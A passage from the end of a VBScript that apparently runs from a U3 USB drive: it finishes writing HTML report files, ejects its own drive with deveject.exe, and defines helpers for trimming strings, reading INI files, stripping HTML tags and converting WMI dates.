objLeftFile.WriteLine "</tbody></table></body></html>"
objLeftFile.Close
Set objLeftFile = Nothing
'right end HTML
objRightFile.WriteLine "<hr color=""#ff9900"" size=""1""></center></body></html>"
objRightFile.Close
objTextFile.Close
Set objTextFile = Nothing
Set objRightFile = Nothing
arrPath = Split(Wscript.ScriptFullName, "\")
strdriveletter = arrPath(0)
'' First we have to change the current directory so we aren't holding the drive open.
objShell.CurrentDirectory = "C:\"
'objShell.Run U3 & "\RemoveDrive " & strdriveletter , 0, True
objShell.Run U3 & "\deveject.exe -EjectDrive:" & strdriveletter & ":",0,True
Set objShell = Nothing
Set objFSO = Nothing
WScript.Quit
'In case machine doesn't have new Scripting Engine 5.0 or later we use the version without regular expressions
Function MyTrim(mystring)
Dim start,Endpos
start=1
for i=1 to Len(mystring)
if Mid(mystring,i,1)=vbTab or Mid(mystring,i,1)=" " Then
start=i+1
else
exit for
end if
next
Endpos=Len(mystring)
for i=Len(mystring) to 1 step -1
if Mid(mystring,i,1)=vbTab or Mid(mystring,i,1)=" " Then
Endpos=i-1
else
exit for
end if
next
if (endpos-start+1)<0 then
MyTrim=""
Exit Function
end if
MyTrim=Mid(mystring,start,Endpos-start+1)
End Function
Function ReadINI(section,key,filename)
if objFSO.FileExists(filename) then
Dim fReadINI, bsection
bsection=False
Set fReadINI = objFSO.OpenTextFile(filename,1)
Do while not(fReadINI.AtEndOfStream)
Dim strini,trimstrini
strini = fReadINI.ReadLine
trimstrini = MyTrim(strini)
if Left(trimstrini,1)="[" and Right(Trimstrini,1)="]" then
if StrComp(Trimstrini,"[" & MyTrim(section) & "]",1)=0 Then
bsection=True
else
bsection =False
end if
Else
if bsection then
Dim poskey
poskey = InStr(Trimstrini,"=")
if posKey>0 then
if StrComp(MyTrim(Left(Trimstrini,poskey-1)),MyTrim(key),1)=0 Then
ReadINI = MyTrim(Mid(Trimstrini,poskey+1))
Exit Function
end If
End if
end if
End if
Loop
End if
ReadINI = ""
End Function
Function RemoveHTML( strText )
Dim nPos1
Dim nPos2
nPos1 = InStr(strText, "<")
Do While nPos1 > 0
nPos2 = InStr(nPos1 + 1, strText, ">")
If nPos2 > 0 Then
strText = Left(strText, nPos1 - 1) & Mid(strText, nPos2 + 1)
Else
Exit Do
End If
nPos1 = InStr(strText, "<")
Loop
RemoveHTML = strText
End Function
Function WMIDateStringToDate(utcDate)
WMIDateStringToDate = CDate(Mid(utcDate, 5, 2) & "/" & _
Mid(utcDate, 7, 2) & "/" & _
Left(utcDate, 4) & " " & _
Mid (utcDate, 9, 2) & ":" & _
Mid(utcDate, 11, 2) & ":" & _
Mid(utcDate, 13, 2))
End Function